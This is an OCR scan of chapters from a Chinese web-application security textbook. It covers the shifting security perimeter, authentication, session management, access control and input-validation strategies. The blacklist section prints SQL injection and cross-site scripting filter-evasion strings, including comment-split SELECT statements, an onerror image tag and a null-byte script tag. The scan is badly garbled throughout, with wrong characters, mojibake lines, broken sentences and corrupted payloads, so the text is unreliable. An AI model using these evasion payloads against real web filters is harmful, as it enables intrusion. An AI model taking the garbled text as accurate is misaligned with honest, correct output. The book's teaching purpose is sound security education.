Web 浏 览 器 提交 专门 设计 的 数据 就 可 攻破 组 织 的 核心 后 端 系 统 。 这 些 数 
aa a a 
网 络 防 御 。 

Web 应 用 程序 的 广泛 应 用 使 得 典型 组 织 的 安全 边界 发 生 了 变化 。 部 
分 安全 边界 仍旧 关注 防火 墙 与 防御 主机 ， 但 大 部 分 安全 边界 更 加 关注 组 
织 所 使 用 的 Web 应 用 程序 。Web 应 用 程序 接收 用 户 输入 的 方式 多 种 多 
样 ， 将 这 些 数据 传送 至 敏感 后 端 系统 的 方式 也 多 种 多 样 ， 这 些 都 是 一 系 
列 攻击 的 潜在 关口 ， 因 此 必须 在 应 用 程序 内 部 执行 防御 措施 ， 以 阻挡 这 
些 攻 击 。 即 使 某 个 Web 应 用 程序 中 的 某 一 行 代码 存在 缺陷 ， 也 会 使 组 织 
的 内 部 系统 易于 遭受 攻击 。 此 外 ， 随 着 “聚合 "应 用 程序 、 第 三 方 小 部 件 
及 其 他 跨 域 集成 技术 的 出 现 ， 服 务 器 端 安全 边界 常常 会 跨越 组 织 本 身 的 
边界 。 而 且 ， 各 种 组 织 还 盲目 地 信任 外 部 应 用 程序 和 服务 。 前 述 有 关 该 
新 的 安全 边界 内 漏洞 发 生 几 率 的 统计 数据 值得 每 一 个 组 织 思考 。 








= 
IA 
2 一 ”注解 ”对 一 个 针对 组 织 的 攻击 者 而 言 ， 获 得 网 络 访问 权 或 
在 服务 器 上 执行 任意 命令 可 能 并 不 是 他 们 真正 想 要 实现 的 目标 。 大 
多 数 或 者 基本 上 所 有 攻击 者 的 真实 意图 是 执行 一 些 应 用 程序 级 行 
为 ， 如 偷 鳃 个 人 信息 、 转 账 或 购买 价格 低廉 的 产品 。 而 应 用 程序 层 
面 上 存在 的 安全 问题 对 实现 这 些 目标 有 很 大 帮助 。 

例如 ， 一 名 攻击 者 希望 “ 疗 入 ”银行 系统 ， 从 用 户 的 账户 中 和 饭 取 


























资金 。 在 银行 使 用 Web 应 用 程序 之 前 ， 攻 击 者 可 能 需要 发 现 公 共 服 
务 中 存在 的 漏洞 ， 并 利用 其 进入 银行 的 DMZ， 罕 透 限制 访问 其 内 
部 系统 的 防火 墙 ， 在 网 络 上 搜索 确定 大 型 计算 机 ， 破 译 用 于 访问 它 
的 秘密 协议 ， 然 后 推测 某 些 证 书 以 进行 登录 。 但 是 ， 如 果 银 行使 用 
易 受 攻击 的 Web 应 用 程序 ， 那 么 攻击 者 可 能 只 需 修改 隐藏 的 HTML 
表单 字段 中 的 一 个 账号 ， 束 可 以 达到 这 一 目的 。 


Web 应 用 程序 安全 边界 发 生变 化 的 另 一 原因 ， 在 于 用 户 本 身 在 访问 
一 个 易 受 攻击 的 应 用 程序 时 面临 的 威胁 。 恶 意 攻击 者 可 能 会 利用 一 个 民 
性 但 易 受 攻击 的 Web 应 用 程序 攻击 任何 访问 它 的 用 户 。 如 果 用 户 位 于 企 
业内 部 网 络 ， 攻 击 者 可 能 会 控制 用 户 的 浏览 器， 并 从 用 尸 的 可 信 位 置 问 
本 地 网 络 发 动 攻击 。 如 果 攻 击 者 心 存 亚 意 ， 他 不 需要 用 户 的 任何 合作 ， 
就 可 以 代表 用 户 执行 任何 行为 。 随 着 浏览 器 扩展 技术 的 兴起 ， 各 种 插件 
不 断 增 多 ， 客 户 问 受 攻击 面 的 范围 也 明显 变 大 。 

网 络 管理 员 清 楚 如 何 防止 其 用 户 访问 恶意 的 web 站 点 ， 终 端 用 户 也 
逐渐 意识 到 这 种 威胁 。 但 是 ， 鉴 于 Web 应 用 程序 漏洞 的 本 质 ， 与 一 个 全 
然 恶意 的 Web 站 点 相 比 ， 易 受 攻击 的 应 用 程序 至 少 给 用 户 及 其 组 织带 来 
了 一 种 威胁 。 因 此 ， 新 的 安全 边界 要 求 所 有 应 用 程序 的 所 有 者 承担 保护 
其 用 户 的 贡 任 ， 使 他 们 免 受 通过 应 用 程序 传送 的 攻击 。 

此 外 ， 人 们 普 遇 采用 电子 邮件 作为 一 种 补充 验证 机 制 ， 安 全 边界 在 
一 定 程 度 上 问 客 户 问 转 移 。 当 前 ， 大 量 应 用 程序 都 包含 “ 瑟 记 密码 ? 功 
能 ， 攻 击 者 可 以 利用 该 功能 向 任何 注册 地 址 发 送 账 户 恢 复 电 子 邮 件 ， 而 
无 须 任 何其 他 用 户 特 定 的 信息 。 因 此 ， 如 果 攻 击 者 攻破 了 用 户 的 Web 邮 
件 账 户 ， 束 可 以 轻松 扩大 攻击 范围 ， 并 攻破 受害 用 户 注 册 的 大 多 数 Web 
应 用 程序 账户 。 


1.2.5 Web 应 用 程序 安 


虽然 经 过 约 10 年 的 广泛 应 用 ， 但 目前 因特网 上 的 Web 应 用 程序 仍然 
充满 漏洞 。 在 了 解 Web 应 用 程序 面临 的 安全 威胁 以 及 如 何 有 效应 对 这 些 
威胁 方面 ， 整 个 行业 仍 未 形成 成 熟 的 意识 。 目 前 几乎 没有 迹象 表明 上 述 
问题 能 够 在 不 远 的 将 来 得 到 解决 。 

也 就 是 说 ，Web 应 用 程序 的 安全 形势 并 非 静 止 不 变 。 尺 管 SQL 注 入 
等 熟悉 的 传统 漏洞 还 在 不 断 出 现 ， 但 已 不 是 主要 问题 。 而 且 ， 现 有 的 漏 
洞 也 变 得 更 难以 友 现 和 利用 。 几 年 前 只 需 使 用 浏览 占 就 能 够 轻易 探测 与 
利用 的 小 漏洞 ， 现 在 需要 花费 大 量 精力 开发 先进 技术 来 肥 现 。 

Web 应 用 程 友 安 全 的 男 一 个 突出 趋势 为 :攻击 目标 已 由 传统 的 服务 



































器 端 应 用 程序 转向 用 户 应 用 程序 。 后 一 类 攻击 仍然 需要 利用 应 用 程序 本 
身 的 缺陷 ， 但 这 类 攻击 一 般 要 求 与 其 他 用 户 进 行 某 种 形式 的 交互 ， 以 达 
到 破坏 用 户 与 易 受 攻击 的 应 用 程序 之 间 交 易 的 目的 。 其 他 软件 安全 领域 
也 同样 存在 这 种 趋势 。 随 着 安全 威胁 意识 的 增强 ， 服 务 器 端 存 在 的 缺陷 
首先 应 为 人 们 所 理解 并 得 到 解决 ， 从 而 可 以 在 进一步 的 研究 过 程 中 将 注 
意 力 集中 在 客户 端 。 本 书 描述 的 全 部 攻击 类 型 中 ， 那 些 针对 其 他 用 户 的 
攻击 是 发 展 最 快 的 攻击 类 型 ， 也 是 当前 许多 研究 的 焦点 所 在 。 

技术 领域 的 各 种 最 新 趋势 在 一 定 程 度 上 改变 了 Web 应 用 程序 的 安全 
状态 。 一 些 极 具 误导 性 的 热门 词汇 使 这 些 趋 势 深 入 人 心 ， 下 面 是 一 些 最 
热门 的 词汇 。 

O Web 2.0。 这 一 术语 指 更 大 范围 地 采用 实现 用 户 生 成 内 容 和 信息 
共享 的 功能 ， 以 及 采用 各 种 广泛 文 持 这 一 功能 的 技术 ， 包 括 异 步 HTTP 
请 求 和 跨 域 集成 。 

口 云 计 算 。 这 一 术语 指 更 多 地 通过 外 部 服务 提供 商 来 实施 技术 栈 的 
各 个 部 分 ， 包 括 应 用 程序 软件 、 应 用 程序 平台 、Web 服 务 器 软件 、 数 据 
库 和 硬件 。 它 也 指 在 托管 环境 中 大 量 采 用 虚拟 化 技术 。 

和 技术 领域 的 大 多 数 变 革 一 样 ， 这 些 趋势 也 众生 了 一 些 新 型 攻击 ， 
Fe BVA BOR PAE ARR EE BR ee eA I) PT BB E, (EA 
FR BCA FH lad el, EIR AMR ATRIA BEE Sr HR 8 PE BY A 
变 。 我 们 将 在 本 书 的 相应 部 分 讨论 与 这 些 及 其 他 最 新 趋势 有 关 的 安全 站 
题 。 

尽管 Web 应 用 程序 发 生 了 所 有 这 些 改变 ， 一 些 典 型 漏洞 并 未 表现 出 
任何 减少 的 迹象 。 它 们 继续 出 现 ， 方 式 与 Web 技 术 发 展 初期 大 致 相同 。 
这 些 漏 洞 包括 业务 逻辑 缺陷 、 未 能 正确 应 用 访问 控制 以 及 其 他 设计 问 
题 。 即 使 在 应 用 程序 组 件 紧 密集 成 及 “一 切 皆 服务 ”的 时 代 ， 这 些 问题 仍 
然 会 广泛 存在 。 


























1.3 小 结 


大 约 十 几 年 的 时 间 ， 万 维 网 已 由 纯粹 的 静态 信息 仓库 发 展 为 功能 强 
大 的 应 用 程序 ， 能 够 处 理 敏 感 的 数据 并 执行 用 于 输出 实际 结果 的 高 度 功 
能 化 的 应 用 程序 。 在 这 个 发 展 过程 中 ， 多 种 因 又 造成 了 当前 绝 大 多 数 
Web 应 用 程序 所 面临 的 安全 保护 不 足 的 状况 。 

多 数 应 用 程序 都 面临 一 个 核心 安全 问题 ， 即 用 户 可 提交 任意 输入 。 
用 户 与 应 用 程序 交互 的 每 一 个 方面 都 可 能 是 恶意 的 ， 而 且 在 未 能 证 明 其 
并 无 恶意 之 前 应 该 被 认定 为 是 恶意 的 。 如 果 这 个 问题 处 理 不 当 ， 应 用 程 
序 就 有 可 能 受到 各 种 形式 的 攻击 。 

当前 Web 应 用 程序 安全 状况 的 所 有 证 据 表 明 ， 这 个 问题 尚未 得 到 很 
好 的 解决 ， 而 且 不 省 是 对 部 区 Web 应 用 程序 的 组 织 还 是 对 访问 它们 的 用 
户 而 言 ， 针 对 Web 应 用 程序 的 攻击 都 是 一 个 严重 的 威胁 。 

















W ebp 应 用 程序 的 基本 安全 问题 〔 所 有 用 户 输入 都 不 可 信 ) 致使 应 


用 程序 实施 大 量 安全 机 制 来 抵御 攻击 。 尺 管 其 设计 细节 与 执行 效率 可 能 
Pe 但 几乎 所 有 应 用 程序 采用 的 安全 机 制 在 概念 上 都 具有 相似 


”web 应 用 程序 采用 的 防御 机 制 由 以 下 几 个 核心 因素 构成 。 
口 处 理 用 户 访问 应 用 程序 的 数据 与 功能 ， 防 止 用 户 获得 未 授权 访 


口 处 理 用 户 对 应 用 程序 功能 的 输入 ， 防 止 错误 输入 造成 不 良 行为 。 
a 防范 攻击 者 ， 确 保 应 用 程序 在 成 为 直接 攻击 目标 时 能 够 正常 运 
转 ， 并 采取 适当 的 防御 与 攻击 措施 挫败 攻击 者 。 

口 管 理应 用 程序 本 身 ， 帮 助 管理 员 监 控 其 行为 ， 配 置 其 功能 。 
鉴于 它们 在 解决 核心 安全 问题 过 程 中 所 发 挥 的 重要 作用 ， 一 个 典型 
应 用 程序 的 绝 大 多 数 受 攻击 面 出 也 由 这 些 机 制 构成 。 知己 知 彼 古 成 争 的 
首要 法 则 ， 那 么 防御 攻击 者 癌 应 用 程序 发 动 有 效 攻击 的 重要 前 提 是 彻底 
了 解 这 些 机 制 。 无 论 读者 在 渗透 测试 方面 是 否 有 经 验 ， 都 应 花 时 间 了 解 
这 些 核心 机 制 在 遇 到 的 每 一 种 应 用 程序 中 的 工作 原理 ， 并 确定 使 其 易于 
受到 攻击 的 弱点 。 





问 。 











21 处理 用 户 访 问 


几乎 任何 应 用 程序 都 必须 满足 一 个 中 心安 全 要 求 ， 即 处 理 用 户 访问 
其 数据 与 功能 。 在 通常 情况 下 ， 用 户 一 般 分 为 几 种 类 型 ， 如 匿名 用 户 、 
正常 通过 验证 的 用 户 和 管理 用 户 。 而 且 ， 许 多 情况 下 ， 不 同 的 用 户 只 多 
许 访问 不 同 的 数据 ， 例 如 ，Web 邮 件 应 用 程序 的 用 户 只 能 阅读 自己 的 而 
非 他 人 的 电子 邮件 。 

大 多 数 Web 应 用 程序 使 用 三 层 相 互 关 联 的 安全 机 制 处 理 用 户 访问 : 

口 喘 份 验证 ; 

口 会 话 管理 ; 

口 访问 控制 。 

上 述 每 一 个 机 制 都 是 应 用 程序 受 攻击 面 的 一 个 关键 部 分 ， 对 于 应 用 
程序 的 总 体 安 全 状况 极其 重要 。 由 于 这 些 机 制 相互 依赖 ， 因 此 根本 不 能 
提供 强大 的 总 体 安全 保护 ， 任 何 一 个 部 分 存在 缺陷 都 可 能 使 攻击 者 自由 
访问 应 用 程序 的 功能 与 数据 。 


2.1.1 中 | 


从 理论 上 说 ， 刁 份 验证 机 制 是 应 用 程序 处 理 用 户 访问 的 最 基本 机 
制 。 验 证 用 户 是 指 确定 用 户 的 真实 身份 。 如 有 末 不 采用 这 个 机 制 ， 应 用 程 
序 会 将 所 有 用 户 作 为 匿名 用 户 对 待 ， 这 是 最 低 一 级 的 信任 。 

今天 ， 绝 大 多 数 Web 应 用 程序 都 采用 传统 的 喘 份 验证 模型 ， 即 要 求 
用 户 提 交 用 户 名 与 密码 ， 再 由 应 用 程序 对 其 进行 核实 ， 确 认 其 合法 性 。 
一 种 典型 的 登录 功能 如 图 2-1 所 示 。 在 安全 性 至 关 重 要 的 应 用 程序 (如 
电子 银行 使 用 的 应 用 程序 ) 中 ， 通 第 使 用 其 他 证 书 与 多 阶段 登录 过 程 强 
化 这 个 基本 模型 。 在 安全 要 求 更 高 的 情况 下 ， 可 能 需要 基于 客户 端 证 
书 、 智 能 卡 或 质询 -响应 令 牌 Cchallenge-response token) 使 用 其 他 身份 
验证 模型 。 除 核心 登录 过 程 外 ， 身 份 验证 机 制 往往 还 要 采取 一 系列 其 他 
文 持 功 能 ， 如 自我 注册 、 账 户 恢复 和 和 密码 修改 工具 。 





























Log in © 


Please log in below by completing the detalls reauested, then select 'Log In’ 

Forsecu rity reasons, you have a limited number of attempts to provide the correct information. Ifyou do 
not provide the correct information, access to your Intelligent Finance plan will be suspended. if this 
happens, ote call 0845 609 4343 and we will send yo anew Plan Security Code. You will then be 
able to access your olan by following the reactivation proce 


Ifyou are not sure about your login details or require help, please call us 


Online Username | This musi be at feast 6 characters long and 


can have jelters and umbers, but no 


Online Password | This must be at fea Characters long and 


ust hay ve DOU | letters and numbers, but 


no 0 spac es 





图 2-1 一 种 典型 的 登录 功能 








尽管 表面 看 似 简 单 ， 但 无 论 是 设计 方面 还 是 执行 方面 ， 身 份 验证 机 
制 都 存在 大 量 缺 陷 。 第 见 的 问题 可 能 使 得 攻击 者 能 够 确定 其 他 用 户 的 用 
户 名 、 推 测 出 他 们 的 密码 ， 或 者 利用 其 逻辑 缺陷 完全 避 开 登录 功能 。 攻 
击 Web 应 用 程序 时 ， 渗 透 测 试 员 应 当 投 入 大 量 精 为 ， 攻 击 应 用 程序 采用 
的 各 种 与 身份 验证 有 天 的 功能 。 出 人 意料 的 是 ， 这 种 功能 中 存在 的 缺陷 
往往 允许 攻击 者 非法 访问 敏感 数据 与 功能 。 


2.1.2 会 话 管理 


处 理 用 户 访问 的 下 一 项 逻辑 任务 是 管理 通过 验证 用 户 的 会 话 。 成 功 
登录 应 用 程序 后 ， 用 户 会 访问 各 种 页 面 与 功能 ， 从 浏览 器 提出 一 系列 
HTTP 请 求 。 与 此 同时 ， 应 用 程序 还 会 收 到 各 类 用 户 (包括 通过 验证 的 
用 户 与 匿名 用 户 ) 发 出 的 无 数 请 求 。 为 实施 有 效 的 访问 控制 ， 应 用 程序 
需要 识别 并 处 理 每 一 名 用 户 提交 的 各 种 请 求 。 

为 满足 以 上 要 求 ， 几 乎 所 有 的 Web 应 用 程序 都 为 每 一 位 用 户 建立 一 
个 会 话 ， 并 向 用 户 发 布 一 个 标识 会 话 的 令 牌 。 会 话 本 身 是 一 组 保存 在 服 
务 器 上 的 数据 结构 ， 用 于 追踪 用 户 与 应 用 程序 的 交互 状态 。 令 牌 是 一 个 
唯一 的 字符 串 ， 应 用 程序 将 其 映射 到 会 话 中 。 当 用 户 收 到 一 个 令 牌 时 ， 
浏览 器 会 在 随后 的 HTTP 请 求 中 将 它 返 回 给 服务 器 ， 帮 助 应 用 程序 将 请 
求 与 该 用 户 联系 起 来 。 虽 然 许 多 应 用 程序 使 用 隐藏 表单 字段 《hidden 











form field) 或 URL 查 询 字 符 串 (query string) 传送 会 话 令 牌 (session 
token) ， 但 HTTP cookie 才 是 实现 这 一 目的 的 常规 方法 。 如 果 用 户 在 一 
段 时 间 内 没有 发 出 请 求 ， 会 话 将 会 自动 终止 ， 如 图 2-2 所 示 。 












Sorry - for your own protection we have had to log you out of your online account 
because you did not use the service for more than 10 minutes. To re-enter your account, 
please log in again 


Would you like to log in now? 





图 2-2 ”一 个 实施 会 话 超时 的 应 用 程序 


就 受 攻击 面 而 言 ， 会 话 管理 机 制 的 有 效 性 基本 上 取决 于 其 令 牌 的 安 
全 性 ， 绝 大 多 数 针对 它 的 攻击 都 企图 攻破 其 他 用 户 的 令 脾 。 如 果 令 牌 被 
攻破 ， 攻 击 者 就 可 以 伪装 成 被 攻破 的 用 户 ， 像 已 经 通过 验证 的 用 户 一 样 
使 用 应 用 程序 。 令 牌 生成 过 程 中 存在 的 缺陷 是 主要 的 漏洞 来 源 ， 使 攻击 
者 能 够 推测 出 发 布 给 其 他 用 户 的 令 牌 ; 随后， 攻击 者 再 利用 令 牌 中 的 缺 
陷 截 获 其 他 用 户 的 令 牌 。 

少数 应 用 程序 不 同 用户 发 布 会 话 令 牌 ， 而 是 通过 其 他 方法 在 多 个 请 
求 中 重复 确认 用 户 身 份 。 如 果 使 用 HTTP 的 内 置身 份 验证 机 制 ， 那 么 浏 
览 志 会 目 动 在 每 个 请 求 中 重复 提交 用 户 证 书 ， 帮 助 应 用 程序 直接 通过 这 
些 请 求 识别 用 户 。 在 其 他 情况 下 ， 应 用 程序 会 将 状态 信息 保存 在 客户 端 
而 非 服 务 嚣 上， 通常 还 需要 对 这 些 信息 进行 加 密 ， 以 防 遭 到 破坏 。 


2.1.3 ”访问 控制 


处 理 用 户 访问 的 最 后 一 个 逻辑 步骤 是 做 出 并 实施 正确 的 决策 ， 决 定 
允许 或 拒绝 每 一 个 请 求 。 如 果 前 面 的 机 制 运作 正常 ， 应 用 程序 即 可 从 收 
到 的 每 一 个 请 求 确认 用 户 的 身份 。 在 此 基础 上 ， 应 用 程序 需要 决定 是 否 
授权 用 户 执行 其 所 请 求 的 操作 或 访问 相关 数据 〈 见 图 2-3) 。 























liome” Acce 


Access Denied [403] 


We're sorry... 


You are not authorized to access this page. 


e Login to the site 

+ If you typed the page ur, check the speling. 

e Click your browser's beck vullon and Uy anolher link. 

+ Consider telling us about the broken link that led you tc this page. 





We apclogize for the inconvenience, and hope we'l see you again soon. 


图 2-3 ”应 用 程序 正 实施 访问 控制 





访问 控制 机 制 一 般 需 要 实现 杂种 精心 设计 的 多 辑 ， 并 分 别 考虑 各 种 
相关 应 用 程序 领域 与 不 同类 型 的 功能 。 应 用 程序 可 支持 无 数 不 同 的 用 户 
角色 ， 每 种 角色 都 拥有 特定 的 权限 ， 每 名 用 户 只 允许 访问 应 用 程序 中 的 
部 分 数据 。 应 用 程序 可 能 需要 根据 用 户 的 号 份 ， 通 过 特殊 功能 实现 交易 
限制 与 其 他 检查 。 

由 于 典型 访问 控制 的 要 求 相 当 复 杂 ， 因 此 这 种 机 制 中 一 般 存 在 大 量 
的 安全 漏洞 ， 使 得 攻击 者 能 够 未 授权 访问 应 用 程序 的 数据 与 功能 。 开 友 
者 经 第 会 对 用 户 与 应 用 程序 的 交互 方式 做 出 错误 假设 ， 并 第 第 会 有 所 下 C 
忽 ， 在 某 些 应 用 程序 功能 中 省 略 访 问 控制 检查 。 探 查 这 些 漏洞 是 一 件 费 
力 的 工作 ， 因 为 需要 对 每 一 项 功能 重复 进行 相同 的 检查 。 然 而 ， 因 为 访 
问 控制 机 制 中 存在 大 量 漏 洞 ， 所 以 在 测试 Web 应 用 程序 时 付出 这 样 的 努 
力 总 是 值得 的 。 第 8 草 我 们 会 讲述 在 执行 严格 的 访问 控制 试 测 时 ， 如 何 
将 茶 些 操作 目 动 化 。 





























2.2 处 所 “1 T 


回想 一 下 第 1 章 描 述 的 基本 安全 问题 : 所 有 用 户 输入 都 不 可 信 。 大 
量 针 对 Web 应 用 程序 的 不 同 攻击 都 与 提交 错误 输入 有 关 ， 攻 击 者 专门 设 
计 这 类 输入 ， 以 引发 应 用 程序 设计 者 无 法 预料 的 行为 。 因 此 ， 能 够 安全 
处 理 用 户 输入 是 对 应 用 程序 安全 防御 的 一 个 关键 要 求 。 

应 用 程序 的 每 一 项 功能 以 及 几乎 每 一 种 常用 的 技术 都 可 能 出 现 输入 
方面 的 漏洞 。 通 稍 来 说 ， 输 入 确认 (input validation〉 是 防御 这 些 攻 击 
的 必要 手段 。 然 而 ， 任 何 一 种 保护 机 制 都 不 是 万 能 的 ， 防 御 恶 意 输 入 也 
并 非 如 上 听 起 来 那样 简单 。 


2.2.1 输入 于 FTE 
典型 的 web 应 用 程序 以 各 种 不 同 的 形式 处 理 用户 提 交 的 数据 。 一 些 


类 型 的 输入 确认 可 能 并 不 适用 或 能 够 确认 所 有 这 些 形式 的 输入 。 通 第 由 
用 户 注册 功能 执行 的 输入 确认 如 图 2-4 所 示 。 








First Name 


la Must contain at least 4 characters 


Last Name 


[a Must contain at least 4 characters 


Cmail 


fa Please provide a valid email address 


Phone number 
la Must contain only numbers 





图 2-4 ”应 用 程序 正 执行 输 入 确认 





在 许多 情况 下 ， 应 用 程序 可 能 会 对 一 些 特殊 的 输入 实行 非常 严格 的 
确认 检查 。 例 如 ， 提 交 给 登录 功能 的 用 户 名 的 最 大 长 度 为 8 个 字符 ， 且 
只 能 包含 字母 


在 其 他 情况 下 ， 应 用 程序 必须 接受 更 广泛 的 输入 。 例 如 ， 提 交 给 个 


Ma Ak Bey A ERE, BE ZR ESE AR lS 5 
其 他 字符 。 但 是 仍然 可 以 对 这 个 字段 实施 有 效 的 限制 。 例 如 ， 提 交 的 数 
据 不 得 超过 某 个 适当 的 长 度 限 制 〈 如 50 个 字符 ) ， 并 不 得 包含 任何 
HTML 标 记 CATMLmarkup) 。 

有 些 时 候 ， 应 用 程序 可 能 需要 接受 用 户 提交 的 任意 输入 。 例 如 ， 一 
名 博客 应 用 程序 用 户 可 以 建立 一 个 主题 为 “攻击 Web 应 用 程序 ”的 博客 。 
博客 文章 和 评论 可 合法 包含 所 讨论 的 明确 攻击 字符 串 。 应 用 程序 可 能 需 
要 将 这 些 输入 保存 在 数据 库 中 ， 写 入 磁盘 ， 并 以 安全 的 方式 同 用 户 显 
示 。 不 能 仅仅 因为 输入 看 似 恶意 〈 但 并 未 显著 破坏 应 用 程序 对 一 些 用 户 
的 价值 ) ， 就 拒绝 接受 该 输入 。 

除了 用 户 通 过 浏览 器 界面 提交 的 各 种 输入 外 ， 一 个 典型 的 应 用 程序 
还 会 收 到 大 量 数据 ， 它 们 在 服务 器 上 生成 ， 并 被 传送 给 客户 端 ， 以 便 客 
户 端 能 够 在 随后 的 请 求 中 将 其 返回 给 服务 器 。 这 些 数据 包括 cookie 和 隐 
藏 表单 字段 ， 普 通 应 用 程序 用 户 虽 然 无 法 浏览 这 些 数据 项 ， 但 攻击 者 能 
够 查看 并 修改 它们 。 在 这 些 情况 下 ， 应 用 程序 通常 可 对 接收 到 的 数据 执 
行 非常 特殊 的 确认 操作 。 例 如 ， 一 个 参数 可 能 必须 包含 一 个 特殊 的 已 知 
值 〈 如 说 明 用 户 首选 语言 的 cookie) ， 或 者 为 某 种 特殊 的 格式 〈 如 一 个 
顾客 的 身份 证 号 码 )。 而 且 ， 如 果 应 用 程序 发 现 服务 器 上 生成 的 数据 遭 
到 修改 ， 并 且 使 用 标准 浏览 器 的 普通 用 户 根 本 不 可 能 进行 此 类 修改 ， 那 
么 极 有 可 能 是 该 用 户 正 企 图 探查 应 用 程序 的 漏洞 。 在 这 些 情况 下 ， 应 用 
程序 应 拒绝 该 用 户 提 交 的 请 求 ， 并 将 事件 记 入 日 志文 件 中 ， 以 便 随 后 进 
行 调查 〈 请 参阅 2.3 节 了 解 相 关内 容 〉。 


2.2.2 输入 处 理 方 :> 


通常 可 及 用 各 种 方法 来 处 理 用 户 输 入 。 不 同 的 方法 一 般 适 用 于 不 同 
的 情形 与 不 同类 型 的 输入 ， 有 时 最 好 结合 采用 几 种 方法 。 

1. “拒绝 已 知 的 不 良 输入 ” 

这 种 方法 一 般 使 用 一 个 黑 名 单 ， 其 中 包含 一 组 在 攻击 中 使 用 的 已 知 
的 字面 量 字 符 串 或 模式 。 确 认 机 制 阻止 任何 与 黑 名 单 匹配 的 数据 ， 并 接 
受 其 他 数据 。 

一 般 来 说 ， 因 为 两 方面 的 主要 原因 ， 这 种 方法 是 确认 用 户 输 入 效率 
最 低 的 方法 。 首 先 ， 攻 击 者 可 通过 一 系列 输入 对 典型 Web 应 用 程序 中 存 
在 的 漏洞 加 以 利用 ， 这 些 输入 可 通过 各 种 方式 进行 编码 ， 或 者 表现 为 不 
同 的 形式 。 除 非 在 最 简单 的 情况 下 ， 人 否则 ， 黑 名 单 可 能 会 忽略 茶 些 可 用 
于 攻击 应 用 程序 的 输入 模式 。 其 次 ， 攻 击 技术 处 在 不 断 发 展 的 过 程 之 
中 。 当 前 的 黑 名 单 无 法 防止 利用 现 有 漏洞 的 新 型 方法 。 
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口 如 果 SELECT 被 阻止 ， 则 演 试 SeLeCt; 

口 如 果 or 1 = 1 -- 被 阻止 ， 则 尝试 or = 2 --; 

口 如 果 alert (xss') 被 阻止 ， 则 和 演 试 prompt ('xss')。 

在 其 他 情况 下 ， 通 过 在 表达 式 之 间 使 用 非 标准 字符 破坏 应 用 程序 执 
行 的 令 牌 ， 可 以 避 开 则 在 阻止 特定 关键 字 的 过 滤 。 例 如 : 


SELECT/ *foo*/username, password/ *foo*/FROM/*foo*/users 


<img%O09onerror=alert({1) src=a> 


最 后 ， 各 种 基于 黑 名 单 的 过 滤 ， 特 别 是 那些 由 Web 应 用 程序 防火 声 
执行 的 过 小， 部 易 受 空 字 市 攻击 。 由 于 在 托管 和 非 托 省 情况 下 处 理 字 符 
串 的 方式 各 不 相同 ， 在 被 阻止 的 表达 式 之 前 的 任何 位 置 插入 空 字 节 可 能 
导致 菜 些 过 滤 占 集 止 处 理 输 入 ， 并 因此 无 法 确定 表达 式 。 例 如 : 


S00<script>alert(1}</script> 


我 们 将 在 第 18 章 介绍 各 种 攻击 Web 应 用 程序 防火 墙 的 其 他 技巧 。 
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OO 注解 ”对 空 字 节 的 处 理 方式 加 以 利用 的 攻击 存在 于 Web 应 
用 程序 安全 的 各 个 领域 。 在 空 字 节 被 当做 字符 串 分 隔 符 的 情况 下 ， 
空 字 节 可 用 于 终止 文件 名 或 对 某 个 后 端 组 件 的 查询 。 在 接受 并 忽略 
空 字 节 的 情况 下 (例如 ， 在 某 些 浏览 器 的 HTML 代 码 中 ) ， 可 以 在 
被 阻止 的 表达 式 中 插入 任意 空 字 节 ， 以 避 开 基于 黑 名 单 的 过 滤 。 这 
类 攻击 将 在 后 面 几 章 详 细 介绍 。 


2. “接受 已 知 的 正常 输入 ” 

这 种 方法 使 用 一 个 白 名 单 ， 其 中 包含 仅 与 民 性 输入 匹配 的 一 组 字面 
量 字符 串 、 模 式 或 一 组 标准 。 确 认 机 制 接受 任何 与 白 名 单 匹 配 的 数据 ， 
并 阻止 其 他 数据 。 例 如 ， 在 数据 库 中 得 询 所 需 的 产品 代码 时 ， 应 用 程序 
可 能 会 确认 其 仅 包 含 字母 数字 字符 ， 长 度 正好 为 6 个 字符 。 根 据 随后 对 
挛 唱 代码 进行 的 处 理 ， 开 发 者 知道 通过 这 种 测试 的 输入 不 会 造成 任何 问 
题 。 

在 切实 可 行 的 情况 下 ， 这 种 方法 是 处 理 潜 在 亚 意 输入 的 最 有 效 方 
法 。 因 为 在 制定 白 名 单 时 已 经 非常 小 心 ， 所 以 攻击 者 无 法 使 用 专门 设计 
的 输入 来 干扰 应 用 程序 的 行为 。 然 而 ， 在 许多 情况 下 ， 应 用 程序 必须 接 
受 并 不 满足 任何 已 知 * 正 党 ?标准 的 数据 ， 并 对 其 进行 处 理 。 例 如 ， 在 一 
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攻击 。 但 也 可 能 存在 这 样 的 要 求 ， 即 应 用 程序 应 允许 任何 人 以 真实 姓名 
注册 。 因 此 ， 虽 然 这 种 方法 极其 有 效 ， 但 基于 和 白 名 单 的 方法 并 非 是 解决 
处 理 用 户 输入 问题 的 万 能 办 法 。 

3. HL 

这 种 方法 认可 有 时 需要 接受 无 法 保证 其 安全 的 数据 。 应 用 程序 并 不 
拒绝 这 种 输入 ， 相 反 ， 它 以 各 种 方式 对 其 进行 净化 ， 防 止 它 造成 任何 不 
利 的 影响 。 数 据 中 可 能 存在 的 恶意 字符 被 彻底 删除 挥 ， 只 留 下 已 知 安 全 
的 字符 ， 或 者 在 进一步 处 理 前 对 它们 进行 适当 编码 或 “ 转 义 ”。 

基于 数据 净化 的 方法 一 般 非 常 有 效 。 在 许多 情况 下 ， 可 将 其 作为 处 
理 恶 意 输入 问题 的 通用 解决 办 法 。 例 如 ， 在 将 危险 字符 植 入 应 用 程序 页 
面前 对 其 进行 HTML 编 码 ， 是 防御 跨 站 点 脚本 攻击 的 常用 方法 (请 参阅 
第 12 章 了 解 相关 内 容 ) 。 然 而 ， 如 果 需 要 在 一 个 输入 项 中 容纳 几 种 可 能 
的 恶意 数据 ， 可 能 就 很 难 对 其 进行 有 效 的 净化 。 这 时 ， 最 好 采用 边界 确 
认 方 法 处 理 用 户 输入 ， 如 后 文 所 述 。 

4. 安全 数据 处 理 

以 不 安全 的 方式 处 理 用 户 提交 的 数据 ， 是 许多 Web 应 用 程序 漏洞 形 
成 的 根本 原因 。 通 常 ， 不 需要 确认 输入 本 里 ， 只 需 确 保 处 理 过 程 绝 对 安 
全 ， 即 可 避免 这 些 漏洞 。 有 些 时 候 ， 可 使 用 安全 的 编程 方法 避免 常见 问 
题 。 例 如 ， 在 数据 库 访 问 过 程 中 正确 使 用 参数 化 查询 ， 就 可 以 避免 $QL 
注入 攻击 (请 参阅 第 9 章 了 解 相关 内 容 ) 。 在 其 他 情况 下 ， 完 全 可 以 避 
a 0 
户 输入 。 

